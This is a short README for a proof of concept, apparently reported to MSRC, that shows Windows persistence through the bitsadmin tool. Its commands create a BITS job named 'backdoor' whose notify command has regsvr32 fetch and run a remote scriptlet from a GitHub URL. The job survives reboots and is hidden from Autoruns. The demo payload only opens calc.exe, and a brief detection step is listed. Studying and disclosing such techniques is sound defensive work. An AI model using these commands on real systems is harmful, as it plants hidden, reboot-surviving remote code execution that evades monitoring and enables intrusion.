└── README.md


/README.md:
--------------------------------------------------------------------------------
 1 | # bitsadminexec
 2 | Use bitsadmin to maintain persistence and bypass Autoruns
 3 | 
 4 | Report to MSRC.
 5 | 
 6 | Author: 3gstudent@3gstudent
 7 | 
 8 | License: BSD 3-Clause
 9 | 
10 | ### POC
11 | 
12 | (1) First we should have the administrator's right.
13 | 
14 | (2) Then run this on cmd with administrator's right:
15 | 
16 | ```
17 | bitsadmin /create backdoor
18 | bitsadmin /addfile backdoor %comspec%  %temp%\cmd.exe
19 | bitsadmin.exe /SetNotifyCmdLine backdoor regsvr32.exe "/u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll"
20 | bitsadmin /Resume backdoor
21 | ```
22 | 
23 | (3) Then it will run the following command to start a calc.exe:
24 | ```
25 | regsvr32.exe "/u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll
26 | ```
27 | 
28 | (4) What's more,after we restart the system,the command to start a calc.exe runs again and again.
29 | 
30 | 
31 | ### Impact of the issue
32 | 
33 | Autoruns's startup monitor can't find this.
34 | 
35 | Test success on Win7 、Win8、Server 2008 and so on.
36 | 
37 | ### Detect
38 | 
39 | Run this to check the jobs and delete it:
40 | ```
41 | bitsadmin /list /allusers /verbose
42 | ```
43 | or
44 | ```
45 | Stop Background Intelligent Transfer Service
46 | ```
47 | 
48 | ### More deatils:
49 | 
50 | http://drops.wooyun.org/tips/15692
51 | 
52 | 《Use bitsadmin to maintain persistence and bypass Autoruns》
53 | 


--------------------------------------------------------------------------------